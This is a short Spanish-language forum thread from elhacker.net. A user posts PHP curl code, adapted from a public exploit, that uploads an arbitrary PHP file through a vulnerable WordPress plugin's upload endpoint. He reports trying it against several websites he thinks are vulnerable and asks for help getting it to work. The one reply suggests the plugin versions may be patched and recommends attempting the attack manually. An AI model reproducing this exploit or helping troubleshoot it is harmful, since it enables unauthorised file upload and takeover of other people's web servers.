Foro de elhacker.net

Seguridad Informática => Nivel Web => Mensaje iniciado por: TapIt en 11 Noviembre 2012, 15:13 pm


Título: Exploit PHP para wordpress
Publicado por: TapIt en 11 Noviembre 2012, 15:13 pm
Muy buenas, estoy intentando utilizar este exploit en PHP.
http://www.exploit-db.com/exploits/18990/

Lo he hecho de la siguiente forma:

He creado un archivo de nombre "exploit.php" al que le añadido este código y lo he subido a un servidor web.
Código:
<?php

$uploadfile="lo.php";
$ch = 
curl_init("http://www.exemple.com/wordpress/wp-content/plugins/html5avmanager/lib/uploadify/custom.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
         array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

Mi pregunta es:
Se supone que lo.php será el nombre del archivo que quiero subir al servidor. Para que el exploit lo encuentre lo he situado en la misma carpeta que está alojado el exploit.

¿Estoy haciendolo correctamente? He realizado varias pruebas en webs que deberían ser vulnerables pero no lo he conseguido.

Muchas gracias por adelantado. Saludos!!

Título: Re: Exploit PHP para wordpress
Publicado por: ~ Yoya ~ en 21 Noviembre 2012, 06:35 am
Quizás la versiones del plugin de las web en la que haz probado no son vulnerables.

De cualquier forma, lo mejor que puedes hacer es intentarlo manualmente.

Saludos.


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines